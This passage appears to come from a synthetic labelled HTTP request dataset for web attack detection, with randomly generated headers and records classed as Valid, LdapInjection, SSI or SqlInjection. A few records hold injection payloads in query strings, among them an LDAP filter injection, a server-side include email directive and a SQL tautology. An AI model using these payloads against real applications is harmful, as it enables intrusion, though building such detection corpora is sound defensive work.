Authorization: ylcdmz mgrnlbi7=uiko
Range: -8,3314-2228
Referer: /zjsdis/emae/aaHNt.mpg
TE: chunked,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/2.5 (compatible; Konqueror/8.8; Unix; eanttt; w1eA; eetezstyt)
UA-CPU: 68000
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6622x661
Via: 8.2 www.oeadWDM.shtml
Transfer-Encoding: compress
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 260 www.A5scBim.tiff "ipsfotscotanialawm" "Fri, 17 Sep 04 23:47:07 CET"
X-Forwarded-For: 21.6.131.96
X-Serial-Number: 9668437330474941
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31949
Start - Id: 38744
class: LdapInjection
GET /tMjYCfN/Adnose/eNdqz@@/ADsfELYgjf/AbinYODHlink/eBxtvaomE7PUkmuf/enEosn7/aZ2.CNyALYpx76t7/zrielnamlh/rY2ErD6G.mvZD6a3j7.cgi?sn=em&hucbd2rm=%29+++%28%7C%28ope%3Dx0dk1*%29&HEAoialgpsCls=64722&er=+t9eEdeeS1h&c1jn2=slu HTTP/1.1
Host: www.Lhcoh6Ee.it
Connection: close
Accept: video/quicktime, audio/basic;q=0.7
Accept-Charset: euc-jp, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 138.65.107.125
Cookie: 2r5hTtnr=0905761;droptju=t7b_cO
Cookie2: $Version="026"
Date: Fri, 07 Apr 06 15:15:49 CET
ETag: W/"T34u9f4B6U@4OC5k"
Expect: fiS4=nShE;sqrii=ejdS6owa
From: Dddcd@u4uew8d4.be
If-Modified-Since: Fri, 06 Apr 07 19:14:57 CET
If-Unmodified-Since: Sat, 29 Nov 08 18:08:10 CET
If-Match: "ou3PqH0-j-mt77a"
If-None-Match: *
If-Range: Thu, 30 Aug 07 23:10:26 CET
Max-Forwards: 365
MIME-Version: 3.6
Pragma: soh4ba=les8bnL
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: NTLM b0VvbGxwc250d2FvM3I4cmFkc3Vlb214OXduckc4aGhocnZyc3I4bWw=
Range: 6-630560,55-36780
Referer: /lAhtnmte/9ehiteso/osea.png
TE: gzip;q=0.7,trailers,gzip
Trailer: If-Range
User-Agent: xaiendptis/0.6.8
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: HTTP/8.8 www.s37hLf.shtml, 6.1 www.o3gya1.html:7
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38744
Start - Id: 4487
class: Valid
PUT /aTpn/IC_-/evbr9edvkosieeo/tmhplhc5ep.aspx? HTTP/1.0
Content-Length: 119
Content-Language: e9rts0u,k
Content-Encoding: compress
Content-Location: /hlss/eaad/Ohgjate.pl
Content-MD5: aDRmQVBlNmh1aVl3c2RwNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Apr 08 17:43:40 CET
Last-Modified: Thu, 24 Aug 06 04:07:16 UTC
Host: 70.2.54.23:73
Connection: close
Accept: text/xml;q=0.6, image/gif
Accept-Charset: windows-1254, x-mac-korean, iso-8859-8;q=0.1, x-mac-greek
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=47
Client-ip: 91.104.180.44
Cookie: zsTcu3=mgml5;nAlelTivnzow=hoEgr;tsesbi7jont=]eta;AhiotnNts=428986;liframenadminTHK367U5=lesntfenrl;hKf_43Z=150676
Cookie2: $Version="8"
Date: Wed, 30 Nov 05 07:08:50 CET
ETag: "wXHuvsEH5vy0Rwmi"
Expect: svel1e=etsIyet;tTqe
From: bf9teahb@eaaAl.be
If-Modified-Since: Sat, 16 Feb 08 23:51:12 CET
If-Unmodified-Since: Tue, 24 Aug 04 21:51:44 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Jul 09 21:26:24 GMT
Max-Forwards: 0412
MIME-Version: 8.8
Pragma: t=sWscef6n
Proxy-Authorization: Digest username="dorrt"
Authorization: tlThn ksird=yOcot
Range: 58-081,-238
Referer: /i8heEl/9iseh.shtml
TE: trailers,gzip;q=0.3
Trailer: Accept
User-Agent: MeswldeeiemEdmtds
UA-CPU: MIPS
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 421x3151
Via: efae/8.0 www.aE2fqhtl.html:736
Transfer-Encoding: identity
Upgrade: Nh5/1.2, 4illg/1.5, plnv0/0.1, dsEn4/3.7
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

input1QYtt5DmdocumentX=tdhreqtcoZieiosa&XE@dO7pU=~to&jetithnaey7c=besamozsseord~jd&reda3ei3ya4r=dt eeOdeletei<)

End - Id: 4487
Start - Id: 24000
class: Valid
GET /uQdXvj3PUr6u/e03HtelnetTN4zJ-D/4ituGRMUCt/nGg6ZzqRS/4CI-QCy7Y0/nt7tachrw9niesbw7iE/el4Ii8A/c12Fhffuk6.sr/z36icT0qwf2yW.bin?RL2C=13O5s7&Eemb4ed=rdesn5%278dzeetm&laktlrHeHuisoa=sdiFNcK5_WQ&XA@vlogVwevalh=nep&ttleEtaE=66&loteylblman=na%29 HTTP/1.1
Host: www.a25nsemcla.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: a-8kxstx;q=0.4, ehogrZh-0;q=0.1, am8-reea, Ep-s9qe, qaoait-euosih
Cache-Control: no-transform
Client-ip: 80.44.139.168
Cookie: 2cteeTreo9=)2rra;lMdropuiKPIallqmochaJ=8275;WCFLCKunion5l1=7080
Cookie2: $Version="9"
Date: Mon, 12 Apr 10 24:58:28 CET
ETag: W/"tsyvamE5kv4yCK-6"
Expect: 100-continue
From: rESt9@oraehs.ch
If-Modified-Since: Mon, 31 Aug 09 19:33:27 GMT
If-Unmodified-Since: Tue, 13 Mar 07 16:11:49 UTC
If-Match: *
If-None-Match: "UtjN8dHWIZY1.Zy8MaXN"
If-Range: Wed, 09 Feb 05 12:47:21 GMT
Max-Forwards: 9
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: NTLM aUVSbmh0eWcyY2gybmZ0MHJkQW5vaXU2Y3J0b3p0b0V6aDQwZ2ZuZXQ=
Range: 57-083666,74376-4577,088-
Referer: http://www.mla4.uk/hat2/enMeal/eO66dra/6srteeum/vioeae4.bin
TE: gzip,trailers
Trailer: Date
User-Agent: tepHArn_F http://www.cuon9pia.be
UA-CPU: StrongARM
UA-Disp: 041,336,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 087x1525
Via: deioro/9.0 www.epachus9.gif, 1.1 www.udrttoee.htm, wSwejn/9.0 www.arome.tiff
Transfer-Encoding: identity
Upgrade: rts9ij/5.7, 8dw/3.0, fp0id/1.5, htnane/8.5, drs/5.0
Warning: 674 www.rCinamAg.tiff "hotntasfbspfip" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 24000
Start - Id: 3206
class: Valid
GET /eraUwCY34KzC/wyectdeeu/dsetnsX/vBl/e4jeeroIevgen/q75WXYE@/h6N/dna_xd1NlC.sh?al=ahWklq6ZILXT&fdrbotheAMep0id=%40aR&o_Ws4xmllinkN=1Yd&rqsotp=49&etluEen=63470330&ej8rsSAmeHol6u=aVWt_DX_Dt&o7uepiLIatfa=hesymrr7%25i4Kt4i HTTP/1.1
Host: 236.227.176.99
Connection: aadi
Accept: text/*, image/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.5, gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: ad1b='okr'
Client-ip: 32.126.132.150
Cookie: ph=760
Cookie2: $Version="5"
Date: Sun, 13 May 07 03:13:10 CET
ETag: "Sqqoqeb1HRptC3yA"
Expect: t3loht
From: asano6tc@asob.it
If-Modified-Since: Fri, 10 Dec 04 13:25:14 GMT
If-Unmodified-Since: Sun, 24 Apr 05 13:59:53 GMT
If-Match: *
If-None-Match: "CpUPsEBio1d84uK8w3p"
If-Range: *
Max-Forwards: 8143
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29laGFybnNlY21sb3d4b2dybmFsbHJpaGhhZVB1NXR3cG5zdXNhYW92bw==
Authorization: carne 3aegisw=UnrOeea
Range: -09285
Referer: http://ilEiu8uy.biz/nhbi7.jsp
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.9 (compatible; MSIE 1.9; Open BSD i386; orhrt; nmtteccp; knanl9sdTn)
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9049x212
Via: 8.3 www.r8khrm.shtml, FTP/9.5 www.tzpfeheh.gif
Transfer-Encoding: identity
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 211.183.197.157
X-Serial-Number: 272265156802487
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3206
Start - Id: 39315
class: SSI
GET /r4nT-vSH0@yaAsc7tkK.sh?e72dyy9arNp=lm&mrog3ftioth=esl%5Dallaoewm&507EZgroup bylq=%3C%21--%23email+fromhost%3D%22www.fhu1noeb.com%22+tohost%3D%22mailbox.ectln.com%22+message%3D%22tIehh+trwalu+evgld3n+couSO%22+fromaddress%3D%22tLgoom.com%22+toaddress%3D%22cdt.wemSae.com%22+subject%3D%22n%22+sender%3D%22imt.com%22+replyto%3D%22hz7eths.com%22+cc%3D%22tt%22+inreplyto%3D%223Ratl+nt1+la%22+id%3D%22wysmail%22+--%3E HTTP/1.1
Host: www.snwrasa1.ch
Connection: close
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: an-tiednn
Cache-Control: only-if-cached
Client-ip: 192.88.225.132
Cookie: Obp=c
Cookie2: $Version="211"
Date: Wed, 25 Feb 04 22:42:49 UTC
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Fri, 24 Jun 05 18:18:24 GMT
If-Unmodified-Since: Mon, 04 Oct 04 20:24:53 UTC
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Thu, 25 Jun 09 03:18:49 CET
Max-Forwards: 4518
MIME-Version: 0.8
Pragma: nx8aih='sy'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: /qpGtctl2/haaoxsst/b1tdl/7t81papn.asmx
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (X11; U; Unix 1.5; mu-y4; rv:6.9.9) Gecko/61754382
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: 2gda
Upgrade: teeb/9.9, nsbrne/6.8, iscd2o/8.2, agY6/9.8, 3nhiao/6.5
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39315
Start - Id: 35291
class: SqlInjection
GET /frmfr/9mRyDMDIi2e_wuInF/mqEEMeR4c79t/il/3nlPit0VQ4TPmvfW/lvOe2gdbaein/c9rQm/i6saepe/5SpDTJ/ay1.OJW851cl9Juv0D/oaarLrtt8/eStd6a.nsf?6i=aazR&F9w3Ktmp=%3Ao&tcoiog9is9dwmm=3&NmcNLLi=ernrciohP+8ueDm&lluoontnforr=unosT8R&weo=re1Nn&ae8sosafalae=OR++%27oh%27++%3D+++%27Sim%27%2B%27ple%27&oahM0ssbsmdeyb=yeb HTTP/1.0
Host: www.tDF0nItlgi.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nakp-NdnS, lefdln8f-it;q=0.6
Cache-Control: max-stale
Client-ip: 65.21.76.100
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Sun, 24 Jun 07 22:03:40 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: *
If-None-Match: "NmfhWOaouEAwGOleW"
If-Range: "XWUUdGnkr@6w.ThJ18"
Max-Forwards: 291
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic aHJwZXVhaDpubGVwcms=
Authorization: Digest cnonce="9eeha"
Range: 930-456,2355-
Referer: /5caS/meg9.zip
TE: trailers,chunked;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/4.9 (compatible; Konqueror/6.0; Open BSD i386; afjehgfI)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35291
Start - Id: 11021
class: Valid
GET /9FMCbweKe/ththEaugf6dd/hXwVqP/0Ye6.exe?91sn4=2&tmt=Aca+&FB6WTconnect6IpseUb=e0lrpIthuoaadasHi&ZtmpTaRftlfmg=atsen+dntnpphpaB&fouamexrr=5adf&mgurn4here1=i1Ip21jE0S&9D=bBeG7PsampeaNns&aoity=s&4mdndooorsu=n%7Cp+n&DYQKil=tpebQc_G&CnullZb=wtdwxp_iaiscriptll HTTP/1.0
Host: 169.200.131.165:4450
Connection: fyzO
Accept: application/rtf, image/*, audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-age=06932
Client-ip: 6.3.140.113
Cookie: rcthdaxidIoles=ekorjJs-6IhN;xetett5Ej=745;msn9eEe8tsaGs=iaunionpmbahagisoloN8\-log
Cookie2: $Version="304"
Date: Wed, 25 Aug 04 23:19:55 GMT
ETag: "9zaHIlbRk0sS1PMR"
Expect: xdphaag
From: 4eas@rtdnopat.ch
If-Modified-Since: Thu, 14 Feb 08 17:21:38 UTC
If-Unmodified-Since: Wed, 11 Mar 09 18:14:00 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Jun 05 08:00:15 GMT
Max-Forwards: 9
MIME-Version: 8.9
Pragma: e=uad
Proxy-Authorization: Basic ZnBzdW9yZ286cmxlNA==
Authorization: Basic dHJpaXB0ZWg6YWNzZW4=
Range: 088577-,4710-50
Referer: http://orjtt.cz/nniGQ/etiwo.mpg
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.2 (Windows; U; Win98 6.7; lt-yg; rv:8.5.9) Gecko/22070244
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 956x6194
Via: 0.2 www.tdjwh.shtml:9319, FTP/0.1 141.59.218.105, octzo/0.2 www.erSg.html
Transfer-Encoding: identity
Upgrade: s5sn/4.8, adeai/3.3, atwla/0.4, 7ias1d/3.0, Syi/9.8
Warning: 534 www.eert2m.png "rsiome4rndpLE" "Sat, 25 Nov 06 03:55:36 GMT"
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11021
Start - Id: 20060
class: Valid
GET /iI_mnK43dfGMSyaCH3./reccinMedcenme/ec/4x.asp?neo6ktedslhrcnw=Uabeameta&Ocneei=i4ei7aemr4a HTTP/1.1
Host: 198.192.157.40
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 180.96.17.0
Cookie: emsussdnoslg=89962;Ya75Na=765;GBimg1v=maoran;i tnog;2f8er=95007;ecKrgfvzt0reqt=k;Etr=82
Cookie2: $Version="3"
Date: Tue, 27 May 08 05:15:25 CET
ETag: "Z6_Ib..yGOPyENmcvJ0"
Expect: ULdrle=mad0ney;378Afnr=gkuia1n5
From: co3eruq@a1tl7.com
If-Modified-Since: Mon, 10 Mar 08 05:32:58 UTC
If-Unmodified-Since: Mon, 21 Jul 08 11:08:11 CET
If-Match: *
If-None-Match: "1B8AVtzQ2tl0WQBH"
If-Range: Wed, 15 Jun 05 08:30:13 UTC
Max-Forwards: 3984
MIME-Version: 0.9
Pragma: ti='eaasei'
Proxy-Authorization: Digest username="leftinn"
Authorization: ntee2 eznw=Ni6s63
Range: -09642
Referer: /ahrsog/rinerro3/hstthE.fgf
TE: trailers,gzip,deflate;q=0.0
Trailer: If-Match
User-Agent: resrmtcqontis
UA-CPU: PowerPC
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1108x908
Via: 7.7 www.eocoues.css, 7.4 www.cn3ois.png, 8.4 www.inead.jpg
Transfer-Encoding: sogoM2
Upgrade: hon1q/9.7, i4su/5.7, 4e14/8.1, erd7i/6.1
Warning: 485 www.jhRr.jpeg:676 "OiasmehS94eryns" "Fri, 26 Aug 05 21:12:46 CET"
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 438818323
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20060
Start - Id: 26267
class: Valid
GET /v6aDzQjhmC1/ejb/rqKWyf3fbqv/@tidv0PiRB.xC/gPd3TCb/IZwxexecuwROXSFodeletek/CAo.239mSYXX9.css?hnrSlaftemb3hEG=eO+inainserteeneeuNslouc&da=3&7@rZBr1stdin=5327804671&aselectXWfYKNl=sajnt++iibniiS&Ea=rbha&Ij-deleteI6Y=1955830&N0kUrootSl=6isi&se=rqhYC6g&amb=4 HTTP/1.1
Host: 165.163.221.144
Connection: otihb
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 62.36.181.122
Cookie: ruR=4212275;tseT=r<Nyzeeu) where3ito\;gt=241357941;sdlgcoe=1913;YxCNvbscript2=44963
Cookie2: $Version="197"
Date: Sun, 02 May 04 22:00:26 UTC
ETag: W/".hQ9s3.xfe8YI5AQB3"
Expect: omlr=Tr6do;aoome8u=aitwtl
From: ifequ3@tlaennspE.it
If-Modified-Since: Fri, 28 Jul 06 06:35:47 GMT
If-Unmodified-Since: Sun, 11 Jan 04 05:25:40 UTC
If-Match: *
If-None-Match: "iDNUerIbn6WNb.NLMfI8"
If-Range: "ZrcMvBYQmWVOuH7V8"
Max-Forwards: 6
MIME-Version: 9.2
Pragma: t='eD'
Proxy-Authorization: Digest response="87dB66307E2ef8c477fd16DCFeD9fd69"
Authorization: idsos 4hitG=ialh25e
Range: -0927,357-,-0110
Referer: /ttlhicj/oNlhs.zip
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: eF.s7B http://www.embs.fr
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4730x760
Via: 6.5 www.ntcmosw.js
Transfer-Encoding: gzip
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 4037485153
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26267
Start - Id: 34800
class: Valid
PUT /obVp_0y.g2luWWIR-/w28YPeu2_yz/tX/tee4i/no84_WN8BRqVn/i9aztaHdptysis2/sR9SMUY/dia9eadz3eesooAprft/nOA9L.html? HTTP/1.1
Content-Length: 209
Content-Language: uai0Nost
Content-Encoding: gzip
Content-Location: http://apetas.it/ioeeeI.png
Content-MD5: ZW5McmVlbGVheWllaW4wZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Apr 07 23:25:56 CET
Last-Modified: Sun, 03 Oct 04 11:32:50 GMT
Host: www.dhm9e.fr:80
Connection: close
Accept: application/postscript;q=0.4, application/*;q=0.8
Accept-Charset: ks_c_5601-1987, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 209.200.52.73
Cookie: hi708spoa=tgeuB_iKb;slP5id=3;a3to25dsactho=592;an=1aa;ursasnnwoot7oba=giesih;umdt=a3toes gs
Cookie2: $Version="30"
Date: Sun, 13 Mar 05 05:14:32 GMT
ETag: W/"QmrzHoOP.OvzI5z9X7"
Expect: 100-continue
From: erhtiA@esgifshqt.ch
If-Modified-Since: Mon, 22 Dec 08 02:00:20 CET
If-Unmodified-Since: Fri, 12 Dec 08 24:39:02 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Jun 04 16:59:52 CET
Max-Forwards: 1210
MIME-Version: 2.7
Pragma: idOmdaeK='ltqUsoSt'
Proxy-Authorization: Digest cnonce="7l7uhe"
Authorization: NTLM dHM5ZDhzdHp0MGVocklvaUE3c2ZtYWE5b3JjZWNyaWsyYTF5dA==
Range: -32368,1-
Referer: /cd4O/hdemto/litrapt/5iit/aSPsc.php
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.4 (compatible; Konqueror/8.0; Linux i386; ertEo; Enormsr4tt)
UA-CPU: x86
UA-Disp: 308,802,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 101x493
Via: 3.3 www.Hnbitr2H.css:98068, 3.7 187.43.64.135
Transfer-Encoding: deflate
Upgrade: plgu/1.6
Warning: 507 208.255.183.240 "owchi" "Fri, 13 Oct 06 02:46:24 UTC"
X-Forwarded-For: 172.233.127.122
X-Serial-Number: 01547887992852
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dot6meflqj=oiunob2&rsxhla=nsSvbb&eEmn7uN=bt63ydivddti4r&aumr81a=ResIscript&Yvlc5x9=at&O6rraoaidti=hyjE_S&mth1ti=22&aheOaslIXX=ab&1sflnhaheehtfiu=aaat| ~h>-dusE&Kx@e4je=hrecccmiet1&trnphohma3io3na=execvBE

End - Id: 34800
Start - Id: 571
class: Valid
GET /aF8/cFnetcatlcdropWxC_VSiUc/zh1/wFY/jtop.js?e3nEuwanios=95259&epEeajat=ch4iscripta%7Eklr+oru&n_zHd9ilTQa=94493&nAs=nchr&oymbaobsrsd=isoDrntpspcaeshh4%7Cnph-t&9h_4OPHIJ@=t2&eldrTRre=ceeU&nLh2e5efunmm=2ctelneti&aEiesa=sadmineu9+m8s&mrellGRiogaele=445&p25nmCnNxgbrtR=98201156&oVMhomelUD=48071453&oPh3w95tmp1vvR=g&1oon4=2&kperosrateaoZo=rfJ9lWW HTTP/1.0
Host: 178.60.158.136:876
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: e=efuaitu
Client-ip: 149.215.56.244
Cookie: Jce6anWbrf=yhmai sbdune9x:;H9eLyrTsi=3;lJO6rMjS8OrI=ei
Cookie2: $Version="8"
Date: Mon, 30 Apr 07 22:28:49 CET
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 100-continue
From: nsineld@Rnhcetdcc.uk
If-Modified-Since: Sat, 21 Jan 06 08:08:20 CET
If-Unmodified-Since: Thu, 18 May 06 06:22:28 GMT
If-Match: "-V8kghd_xTzratK_J0"
If-None-Match: "t6T1cMP8ohKCSMlJSQDM"
If-Range: Fri, 29 Jul 05 17:04:04 CET
Max-Forwards: 2
MIME-Version: 4.0
Pragma: tep='8nO'
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: ooer arxl=7xVfetts
Range: 31686-
Referer: /sphcCq/4fbsgn.swf
TE: deflate,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (compatible; MSIE 4.4; Unix; glteeHnl; giap6asot3)
UA-CPU: MIPS
UA-Disp: 7728,139,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 2.7 www.a9of.gif, HTTP/8.4 111.243.249.230
Transfer-Encoding: gzip
Upgrade: arBWie/0.4, pfc7lr/3.0, noV/9.4
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 571
Start - Id: 20937
class: Valid
GET /i.gB/eLR/es4Ow/2vj7tderdeacfehgyma/iqB/1o.VG_sDnCNSY_/8mGscriptxYaeSwbZHN-/wc/otanylsponlo.jpg? HTTP/1.0
Host: www.rnnb7hyPl.st:9930
Connection: rctbcxds
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: lisd6eh3-s23S;q=0.7
Cache-Control: max-stale=2
Client-ip: 176.75.134.165
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Mon, 25 Jan 10 15:47:11 GMT
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: sbmyjz=nf9bml;nyae
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 09 Jan 10 21:42:27 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "fuzcjQOvwRlxBHarH1"
If-None-Match: "aJSqmGDbyd5Kq95NA6k"
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 27
MIME-Version: 3.1
Pragma: tqn=g
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Basic VlN6ZWRscm46aGV3bmVj
Range: 8-0,694610-
Referer: /HceeG3/f8ls6/hspfD/e4ea/cnfW4p1i.jpg
TE: gzip;q=0.4,gzip
Trailer: User-Agent
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 2.6; hg-ee; rv:3.2.5) Gecko/34756420
UA-CPU: x86
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 308x307
Via: tiia/8.6 140.193.219.130, HTTP/7.9 www.eeRbonbw.js, 8.1 19.221.82.149
Transfer-Encoding: deflate
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20937
Start - Id: 4698
class: Valid
PUT /2tox/tZ@.1wP-LluoDwB/d9/iryataj/bwaOHoO8iheogno/xapcn6/eneMrptEnsuotPnt/derit/swezhg/6.71VHy/en6.sh? HTTP/1.1
Content-Length: 30
Content-Language: A,e5laQn,avt
Content-Encoding: compress
Content-Location: http://nueltm.be/sdwoc/44os/ahohti0/nssxEeib/Smgrur.msf
Content-MD5: cmlpaXQ3YXQzbGEzcmhlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Apr 09 22:38:16 GMT
Last-Modified: Fri, 11 Aug 06 03:49:53 CET
Host: www.eSooerkD4.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1250;q=0.5, x-mac-korean, isiri-3342;q=0.3, x-mac-arabic
Accept-Encoding: 
Accept-Language: 8s2d-gn;q=0.5, hwwi-stc6
Cache-Control: hkeeer='nshEodw'
Client-ip: 110.67.81.196
Cookie: i6bure=aFg0zkWGP;teqsoaNsnont=0479158782
Cookie2: $Version="649"
Date: Thu, 03 Jan 08 12:44:17 GMT
ETag: "s6xzdjA.sIFunEY"
Expect: sr4rhyR
From: sioaA@hwxrt2des.de
If-Modified-Since: Mon, 11 Oct 04 07:04:35 CET
If-Unmodified-Since: Sat, 27 May 06 01:06:31 UTC
If-Match: "aitHYgRDDT.4kafEnU.s"
If-None-Match: *
If-Range: Tue, 21 Nov 06 14:27:42 GMT
Max-Forwards: 74
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: ln6dT eojt=nesa
Authorization: Basic bDJVZWhpcmw6QUF0b2lJ
Range: 19347-31772
Referer: http://www.E2nurTni.be/8itgt2/tmtq.sh
TE: gzip;q=0.2
Trailer: Expect
User-Agent: Mozilla/4.2 (compatible; lqoy; Open BSD i586; 8ytRT8Yn)
UA-CPU: Sparc
UA-Disp: 6565,867,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5828x404
Via: 6.5 227.232.158.172, FTP/5.3 254.199.123.109:88034
